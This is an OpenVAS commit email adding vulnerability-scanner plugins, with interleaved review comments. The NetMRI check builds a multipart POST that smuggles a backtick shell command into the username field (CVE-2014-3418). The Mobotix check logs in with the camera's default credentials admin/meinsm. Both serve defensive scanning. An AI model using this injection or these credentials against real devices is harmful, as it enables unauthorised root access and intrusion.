[Openvas-nvts-commits] r566 - / scripts scripts/2012 scripts/2014 scripts/pre2008

scm-commit at wald.intevation.org scm-commit at wald.intevation.org
Tue Jul 15 16:09:14 CEST 2014


Author: mime
Date: 2014-07-15 16:09:14 +0200 (Tue, 15 Jul 2014)
New Revision: 566

Added:
   scripts/2014/gb_mobotix_cameras_default_credentials.nasl
   scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl
Modified:
   ChangeLog
   scripts/2012/gb_netmri_detect.nasl
   scripts/gb_canon_printers_detect.nasl
   scripts/pre2008/dont_scan_printers.nasl
Log:
Added new plugins. Updated to detect more versions. Update for Canon detection.

Modified: ChangeLog
===================================================================
--- ChangeLog	2014-07-15 09:26:23 UTC (rev 565)
+++ ChangeLog	2014-07-15 14:09:14 UTC (rev 566)
@@ -1,3 +1,16 @@
+2014-07-15 Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/2014/gb_mobotix_cameras_default_credentials.nasl,
+	scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl:
+	Added new plugins.
+
+	* scripts/2012/gb_netmri_detect.nasl:
+	Updated to detect more versions.
+
+	* scripts/gb_canon_printers_detect.nasl
+	scripts/pre2008/dont_scan_printers.nasl:
+	Update for Canon detection.
+
 2014-07-15 Antu Sanadi <santu at secpod.com>
 
 	* scripts/2014/deb_2978.nasl,

Modified: scripts/2012/gb_netmri_detect.nasl
===================================================================
--- scripts/2012/gb_netmri_detect.nasl	2014-07-15 09:26:23 UTC (rev 565)
+++ scripts/2012/gb_netmri_detect.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -92,7 +92,8 @@
 
 c = 0;
 
-if("<title>NetMRI Login" >< data) {
+if("<title>NetMRI Login" >< data || "<title>Network Automation Login" >< data)
+{
 
   lines = split(data);
 
@@ -100,6 +101,7 @@
 
     c++;
 
+    vers = 'unknown';
     if("Version:" >< line) {
 
        version = eregmatch(pattern:"<td>([^<]+)</td>", string:lines[c]); 
@@ -107,21 +109,21 @@
 
        vers = version[1];
 
-       set_kb_item(name: string("www/", port, "/netmri"), value: string(vers," under /"));
-       set_kb_item(name:"netMRI/installed", value:TRUE);
+    }    
 
-       cpe = build_cpe(value:vers, exp:"^([0-9.]+)", base:"cpe:/a:infoblox:netmri:");
-       if(isnull(cpe))
-         cpe = 'cpe:/a:infoblox:netmri';
+    set_kb_item(name: string("www/", port, "/netmri"), value: string(vers," under /"));
+    set_kb_item(name:"netMRI/installed", value:TRUE);
 
-       register_product(cpe:cpe, location:install, nvt:SCRIPT_OID, port:port);
+    cpe = build_cpe(value:vers, exp:"^([0-9.]+)", base:"cpe:/a:infoblox:netmri:");
+    if(isnull(cpe))
+      cpe = 'cpe:/a:infoblox:netmri';
 
-       log_message(data: build_detection_report(app:"NetMRI", version:vers, install:"/", cpe:cpe, concluded: version[0]),
-                   port:port);
+    register_product(cpe:cpe, location:install, nvt:SCRIPT_OID, port:port);
 
-       exit(0);
+    log_message(data: build_detection_report(app:"NetMRI", version:vers, install:"/", cpe:cpe, concluded: version[0]),
+                port:port);
 
-    }  
+    exit(0);
   }  
 }  
 
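Review bot: The reporting block that now follows the `if("Version:" >< line)` branch and ends in `exit(0);` appears to sit inside the per-line loop, so the script would register the product and exit while processing the first line of the page, before a later "Version:" line is read, and the version would then almost always be reported as 'unknown'. The loop header lies between the hunks and is not visible, so this is inferred from the brace nesting at the end of the hunk. I would set `vers = 'unknown';` once before the loop (the second hunk resets it on every iteration) and move everything from `set_kb_item(name: string("www/", port, "/netmri"), ...)` through `exit(0);` below the loop's closing brace. `concluded: version[0]` is also read on the path where no match was made, so the report should only pass it when `version` is set.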

Added: scripts/2014/gb_mobotix_cameras_default_credentials.nasl
===================================================================
--- scripts/2014/gb_mobotix_cameras_default_credentials.nasl	                        (rev 0)
+++ scripts/2014/gb_mobotix_cameras_default_credentials.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -0,0 +1,112 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mobotix Cameras Default Admin Credentials
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2014 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+include("revisions-lib.inc");
+
+tag_summary = 'The remote Mobotix camera web interface is prone to a default
+account authentication bypass vulnerability.';
+
+tag_impact = 'This issue may be exploited by a remote attacker to gain
+access to sensitive information or modify system configuration.';
+
+tag_insight = 'It was possible to login with default credentials admin/meinsm.';
+tag_vuldetect = 'Try to login with default credentials.';
+tag_solution = 'Change the password.';
+
+ desc = "
+Summary:
+" + tag_summary + "
+
+Vulnerability Detection:
+" + tag_vuldetect + "
+
+Vulnerability Insight:
+" + tag_insight + "
+
+Impact:
+" + tag_impact + "
+
+Solution:
+" + tag_solution;
+
+if (description)
+{
+ script_oid("1.3.6.1.4.1.25623.1.0.105060"); 
+ script_version("$Revision$");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("Mobotix Cameras Default Admin Credentials");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2014-07-15 10:02:06 +0200 (Thu, 15 Jul 2014)");
+ script_description(desc);
+ script_summary("Determine if it is possible to login with default credentials.");
+ script_category(ACT_ATTACK);
+ script_family("Default Accounts");
+ script_copyright("This script is Copyright (C) 2014 Greenbone Networks GmbH");
+ script_dependencies("find_service.nasl", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+
+ if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
+   script_tag(name : "summary" , value : tag_summary);
+   script_tag(name : "impact" , value : tag_impact);
+   script_tag(name : "vuldetect" , value : tag_vuldetect);
+   script_tag(name : "insight" , value : tag_insight);
+   script_tag(name : "solution" , value : tag_solution);
+ }
+
+ exit(0);
+}
+
+include("http_func.inc");
+include("misc_func.inc");
+
+port = get_http_port( default:80 );
+if( ! get_port_state( port ) ) exit( 0 );
+
+host = get_host_name();
+url = '/admin/index.html';
+
+req = 'GET ' + url + ' HTTP/1.1\r\n' + 
+      'Host: ' + host + '\r\n';
+
+buf = http_send_recv( port:port, data:req + '\r\n', bodyonly:FALSE );
+if( "401 Unauthorized" >!< buf || "MOBOTIX Camera User" >!< buf ) exit( 0 );
+
+userpass64 = base64( str:'admin:meinsm' );
+
+req += 'Authorization: Basic ' + userpass64 + '\r\n\r\n';
+buf = http_send_recv( port:port, data:req, bodyonly:FALSE );
+
+if( buf =~ "HTTP/1\.. 200" && "/admin/access" >< buf )
+{
+  report = 'It was possible to login with username "admin" and password "meinsm"\n';
+  security_message( port:port, data:report);
+} 
+
+exit( 99 );
+
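Review bot: After `security_message( port:port, data:report);` the script falls through to `exit( 99 );`, so a host that accepted the default login ends on the same exit path as one that rejected it; the NetMRI plugin added in this commit calls `exit( 0 );` inside its reporting branch, and this one should do the same. The request built here also carries no `User-Agent` header, unlike the NetMRI check, which makes the login attempt harder to attribute to the scanner in the camera's or a proxy's logs; adding `'User-Agent: ' + OPENVAS_HTTP_USER_AGENT + '\r\n'` to `req` would fix that. The `creation_date` tag says "Thu, 15 Jul 2014", while the commit header gives Tue for the same date.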


Property changes on: scripts/2014/gb_mobotix_cameras_default_credentials.nasl
___________________________________________________________________
Added: svn:keywords
   + Id Revision Date

Added: scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl
===================================================================
--- scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl	                        (rev 0)
+++ scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -0,0 +1,167 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Infoblox NetMRI OS Command Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2014 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+include("revisions-lib.inc");
+
+CPE = "cpe:/a:infoblox:netmri";
+
+tag_impact = "An attacker may leverage these issues to execute arbitrary code as root";
+
+tag_affected = "Infoblox NetMRI versions 6.4.X.X-6.8.4.X are vulnerable;a
+other versions may also be affected.";
+
+tag_summary = "Infoblox NetMRI is prone to a OS Command Injection Vulnerability";
+tag_solution = "Update to Infoblox NetMRI >= 6.8.5";
+tag_vuldetect = "Send a special crafted HTTP POST request and check the response";
+
+if (description)
+{
+ script_oid("1.3.6.1.4.1.25623.1.0.105061");
+ script_cve_id("CVE-2014-3418");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_version ("$Revision$");
+
+ script_name("Infoblox NetMRI OS Command Injection Vulnerability");
+
+ desc = "
+Summary:
+" + tag_summary + "
+
+Vulnerability Detection:
+" + tag_vuldetect + "
+
+Impact:
+" + tag_impact + "
+
+Affected Software/OS:
+" + tag_affected + "
+
+Solution:
+" + tag_solution;
+
+ script_xref(name:"URL", value:"http://packetstormsecurity.com/files/127409/Infoblox-6.8.4.x-OS-Command-Injection.html");
+ script_xref(name:"URL", value:"http://www.infoblox.com/");
+ 
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2014-07-15 14:33:34 +0200 (Tue, 15 Jul 2014)");
+ script_description(desc);
+ script_summary("Determine if it is possible to execute a command");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2014 Greenbone Networks GmbH");
+ script_dependencies("gb_netmri_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ script_require_keys("netMRI/installed");
+
+ if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
+    script_tag(name : "impact" , value : tag_impact);
+    script_tag(name : "vuldetect" , value : tag_vuldetect);
+    script_tag(name : "solution" , value : tag_solution);
+    script_tag(name : "summary" , value : tag_summary);
+    script_tag(name : "affected" , value : tag_affected);
+  }
+
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+
+if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
+host = get_host_name();
+
+check = 'openvas_' + rand();
+bound = rand();
+
+payload = 'echo ' + check  + ' > /var/home/tools/skipjack/app/webui/OpenVAS_RCE_Check.txt';
+
+data = '-----------------------------' + bound  + '\r\n' +
+      'Content-Disposition: form-data; name="_formStack"\r\n' +
+      '\r\n' +
+      'netmri/config/userAdmin/login\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="mode"\r\n' +
+      '\r\n'  +
+      'DO-LOGIN\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="eulaAccepted"\r\n' +
+      '\r\n' +
+      'Decline\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="TrustToken"\r\n' +
+      '\r\n' +
+      '\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="skipjackUsername"\r\n' +
+      '\r\n' +
+      'admin`' + payload + '`\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="skipjackPassword"\r\n' +
+      '\r\n' +
+      'admin\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="weakPassword"\r\n' +
+      '\r\n' +
+      'true\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="x"\r\n' +
+      '\r\n' +
+      '0\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="y"\r\n' +
+      '\r\n' +
+      '0\r\n' +
+      '-----------------------------' + bound + '--';
+
+len = strlen( data );
+
+req = 'POST /netmri/config/userAdmin/login.tdf HTTP/1.1\r\n' + 
+      'Host: ' + host + '\r\n' + 
+      'User-Agent: ' + OPENVAS_HTTP_USER_AGENT + '\r\n' + 
+      'Content-Type: multipart/form-data; boundary=---------------------------' + bound + '\r\n' + 
+      'Content-Length: ' + len + '\r\n' + 
+      '\r\n' + data;
+
+result = http_send_recv( port:port, data:req, bodyonly:FALSE );
+
+if( ! result || result !~ "HTTP/1.. 200" ) exit( 0 );
+
+url = '/webui/OpenVAS_RCE_Check.txt';
+req1 = http_get( item:url, port:port );
+buf = http_send_recv( port:port, data:req1, bodyonly:FALSE );
+
+if( check >< buf )
+{
+  security_message( port:port, expert_info: 'Request:\n' + req + '\nResponse:\n' + result );
+  exit( 0 );
+}
+        
+exit( 99 );
+
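Review bot: The marker file `OpenVAS_RCE_Check.txt` is written into the appliance's web UI directory and never removed, so each scan of a vulnerable host leaves an artifact that stays retrievable over HTTP, and neither the description nor the report tells the operator about it. At minimum the `security_message` text should name the file and its path so it can be deleted after the scan, and `tag_vuldetect` should state that the test writes to the target. `tag_affected` contains a stray character (`vulnerable;a`) that will appear in the report; it should read `vulnerable;`. The status check `result !~ "HTTP/1.. 200"` leaves the first dot unescaped, unlike `"HTTP/1\.. 200"` in the Mobotix plugin from this commit.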


Property changes on: scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl
___________________________________________________________________
Added: svn:keywords
   + Id Revision Date

Modified: scripts/gb_canon_printers_detect.nasl
===================================================================
--- scripts/gb_canon_printers_detect.nasl	2014-07-15 09:26:23 UTC (rev 565)
+++ scripts/gb_canon_printers_detect.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -83,12 +83,19 @@
 buf = http_send_recv(port:port, data:req, bodyonly:FALSE);
 
 ## Confirm the application
-if('>Canon' >< buf && ">Copyright CANON INC" ><  buf && "Printer" >< buf)
+if(('>Canon' >< buf && ">Copyright CANON INC" ><  buf && "Printer" >< buf) || "CANON HTTP Server" >< buf)
 {
    set_kb_item(name:"target_is_printer", value:1);
    set_kb_item(name:"canon_printer/installed", value:1);
    set_kb_item(name:"canon_printer/port", value: port);
 
+   pref = get_kb_item("global_settings/exclude_printers");
+   if( pref  == "yes" )
+   {
+       set_kb_item(name: "Host/dead", value: TRUE);
+       log_message( port:port, data:'The remote host is a printer. The scan has been disabled against this host.\nIf you want to scan the remote host, uncheck the "Exclude printers from scan" option and re-scan it.');
+   }
+
    ## Get the model name
    printer_model = eregmatch(pattern:">(Canon.[A-Z0-9]+).[A-Za-z]+<", string: buf);
    if(printer_model[1])
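Review bot: The new alternative `"CANON HTTP Server" >< buf` matches that string anywhere in the response, headers or body, and with "Exclude printers from scan" enabled a match now sets `Host/dead` even when no model is found, so any host returning this text drops out of the scan. That coverage gap should be bounded by tying the match to the response header, e.g. `egrep(pattern:"^Server: CANON HTTP Server", string:buf)`, assuming the string is sent as the Server banner (the commit does not show a sample response). The same loose match is added in scripts/pre2008/dont_scan_printers.nasl in this commit. The enclosing `if` block continues outside the hunk.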
@@ -113,13 +120,6 @@
                  " printer device.\nCPE: " + cpe + "\nConcluded: " +
                  printer_model[1], port:port);
 
-     pref = get_kb_item("global_settings/exclude_printers");
-     if( pref  == "yes" )
-     {
-         set_kb_item(name: "Host/dead", value: TRUE);
-         log_message( port:port, data:'The remote host is a printer. The scan has been disabled against this host.\nIf you want to scan the remote host, uncheck the "Exclude printers from scan" option and re-scan it.');
-     }
-
       exit(0);
 
   }

Modified: scripts/pre2008/dont_scan_printers.nasl
===================================================================
--- scripts/pre2008/dont_scan_printers.nasl	2014-07-15 09:26:23 UTC (rev 565)
+++ scripts/pre2008/dont_scan_printers.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -171,7 +171,7 @@
 
 
 # Patch by Laurent Facq
-ports = make_list(80, 280, 631, 443);
+ports = make_list(80, 8000, 280, 631, 443);
 foreach port (ports)
 {
  if(get_port_state(port))
@@ -215,7 +215,7 @@
       exit(0);
     }
 
-    else if ('>Canon' >< buf && ">Copyright CANON INC" ><  buf && "Printer" >< buf)
+    else if (('>Canon' >< banner && ">Copyright CANON INC" ><  banner && "Printer" >< banner) || "CANON HTTP Server" >< banner)
     {
        set_kb_item(name: "Host/dead", value: TRUE);
        if (debug_level) display(get_host_ip(), " runs a Canon web server\n");
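Review bot: The condition now tests `banner` where it previously tested `buf`, and the commit log does not mention that switch. `'>Canon'` and `">Copyright CANON INC"` look like HTML body markup, so if `banner` holds only the response headers (its assignment is outside the hunk) the first alternative can never match and only `"CANON HTTP Server"` is effective. If that is the case, the body patterns should stay on the body variable, `('>Canon' >< buf && ">Copyright CANON INC" >< buf && "Printer" >< buf) || "CANON HTTP Server" >< banner`. A one-line comment at the assignment of `banner` saying whether it includes the body would settle this for the next reader.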


